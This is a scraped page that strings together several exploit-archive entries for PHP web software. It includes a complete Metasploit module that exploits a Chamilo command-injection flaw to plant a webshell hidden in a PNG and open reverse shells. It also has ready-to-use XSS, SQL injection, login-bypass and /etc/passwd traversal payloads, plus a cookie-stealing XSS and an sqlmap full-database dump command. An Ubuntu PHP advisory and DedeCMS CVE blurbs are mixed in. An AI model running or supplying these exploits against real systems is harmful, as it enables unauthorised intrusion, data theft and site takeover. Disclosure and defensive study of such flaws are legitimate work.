DedeCMS up to and including 5.7.110 was discovered to contain a cross-site scripting (XSS) vulnerability at /dede/freelist_add.php via the title parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40876: BugReport/php/DedeCMS/xss3.md at main · DiliLearngent/BugReport

DedeCMS up to and including 5.7.110 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities at /dede/vote_edit.php via the votename and votenote parameters.

CVE-2023-40875: BugReport/php/DedeCMS/xss2.md at main · DiliLearngent/BugReport

DedeCMS up to and including 5.7.110 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities at /dede/vote_add.php via the votename and voteitem1 parameters.

CVE-2023-40874: BugReport/php/DedeCMS/xss1.md at main · DiliLearngent/BugReport

Ubuntu Security Notice 6305-1 - It was discovered that PHP incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information. It was discovered that PHP incorrectly handled certain PHAR files. An attacker could possibly use this issue to cause a crash, expose sensitive information or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6305-1  
August 23, 2023

php8.1 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain XML files.  
An attacker could possibly use this issue to expose sensitive information.  
(CVE-2023-3823)

It was discovered that PHP incorrectly handled certain PHAR files.  
An attacker could possibly use this issue to cause a crash,  
expose sensitive information or execute arbitrary code.  
(CVE-2023-3824)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.3  
  php8.1                          8.1.12-1ubuntu4.3  
  php8.1-cgi                      8.1.12-1ubuntu4.3  
  php8.1-cli                      8.1.12-1ubuntu4.3  
  php8.1-fpm                      8.1.12-1ubuntu4.3  
  php8.1-xml                      8.1.12-1ubuntu4.3

Ubuntu 22.04 LTS:  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.14  
  php8.1                          8.1.2-1ubuntu2.14  
  php8.1-cgi                      8.1.2-1ubuntu2.14  
  php8.1-cli                      8.1.2-1ubuntu2.14  
  php8.1-fpm                      8.1.2-1ubuntu2.14  
  php8.1-xml                      8.1.2-1ubuntu2.14

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6305-1  
  CVE-2023-3823, CVE-2023-3824

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.3  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.14

Ubuntu Security Notice USN-6305-1

This Metasploit module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions 1.11.18 and below. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at the OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',        'Description' => %q{          Chamilo is an e-learning platform, also called Learning Management Systems (LMS).          This module exploits an unauthenticated remote command execution vulnerability          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).          Due to a functionality called Chamilo Rapid to easily convert PowerPoint          slides to courses on Chamilo, it is possible for an unauthenticated remote          attacker to execute arbitrary commands at OS level using a malicious SOAP          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author          'Randorisec' # Original research        ],        'References' => [          ['CVE', '2023-34960'],          ['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],          ['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']        ],        'License' => MSF_LICENSE,        'Platform' => ['php', 'unix', 'linux'],        'Privileged' => false,        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'Linemax' => 65535,              'CmdStagerFlavor' => ['wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-01',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),      OptString.new('WEBSHELL', [        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil      ], conditions: %w[TARGET == 0])    ])  end  def soap_request(cmd)    # create SOAP request exploiting CVE-2023-34960    # Randomize ppt size    ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"    return <<~EOS      <?xml version="1.0" encoding="UTF-8"?>      <SOAP-ENV:Envelope        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"        xmlns:ns1="#{target_uri.path}"        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"        xmlns:xsd="http://www.w3.org/2001/XMLSchema"        xmlns:ns2="http://xml.apache.org/xml-soap"        xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"        SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">        <SOAP-ENV:Body>          <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">              <item>                <key xsi:type="xsd:string">file_data</key>                <value xsi:type="xsd:string"></value>              </item>              <item>                <key xsi:type="xsd:string">file_name</key>                <value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>              </item>              <item>                <key xsi:type="xsd:string">service_ppt2lp_size</key>                <value xsi:type="xsd:string">#{ppt_size}</value>              </item>            </param0>          </ns1:wsConvertPpt>        </SOAP-ENV:Body>      </SOAP-ENV:Envelope>    EOS  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = if datastore['WEBSHELL'].blank?                       "#{Rex::Text.rand_text_alpha(8..16)}.php"                     else                       datastore['WEBSHELL'].to_s                     end    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    # inject PHP payload into the PLTE chunk of a PNG image to hide the payload    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')    return nil if png_webshell.nil?    # encode webshell data and write to file on the target for execution    payload = Base64.strict_encode64(png_webshell.to_s)    cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),      'ctype' => 'text/xml; charset=utf-8',      'data' => soap_request(cmd).to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    # Encode payload with base64 and decode with openssl (most common installed on unix systems)    payload = Base64.strict_encode64(cmd)    cmd = "echo #{payload}|openssl enc -a -d|sh"    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),      'ctype' => 'text/xml; charset=utf-8',      'data' => soap_request(cmd).to_s    })  end  def check    # Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.    print_status("Checking if #{peer} can be exploited.")    marker = Rex::Text.rand_text_alphanumeric(8..16)    res = execute_command("echo #{marker}")    if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)      CheckCode::Vulnerable    else      CheckCode::Safe('No valid response received from the target.')    end  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      res = upload_webshell      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')      register_file_for_cleanup(@webshell_name.to_s)      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Chamilo 1.11.18 Command Injection

GEN Security+ version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Us3 P@yL04D: GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1[+] http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GEN Security+ 4.0 Cross Site Scripting

Geeklog version 2.1.0b1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Geeklog v2.1.0b1 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.geeklog.net/                                                                                            || # Dork      : Powered by Geeklog                                                                                                 |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use Payload : calendar/index.php?view=day&day=05&month=10&year=2014 [+]  http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)[+]  login : http://127.0.0.1/public_html/admin Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Geeklog 2.1.0b1 SQL Injection

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

User Registration and Login and User Management System version 3.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedDescriptionUser Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable toPersistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.POCUser side1. Go to the user registration page http://localhost/loginsystem.2. Enter <img src="x" onerror=alert(document.cookie)> in one of thefields (first name, last name, email, or contact).3. Click sign up.Admin side1. Login to admin panel http://localhost/loginsystem/admin.2. After login successfully go to manage user page.3. PayloadThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 Cross Site Scripting

User Registration and Login and User Management System version 3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedProof Of Concept:1. Navigate to the admin login page.URL: http://192.168.1.5/loginsystem/admin/2. Enter "*admin' -- -*" in the admin username field and anythingrandom in the password field.3. Now you successfully logged in as admin.4. To download all the data from the database, use the below commands.  4.1. Login to the admin portal and capture the request.  4.2. Copy the intercepted request in a file.  4.3. Now use the below command to dump all the dataCommand:  sqlmap -r <file-name> -p username -D loginsystem --dump-allThanks and Regards,Ashutosh Singh Umath

Tag

#php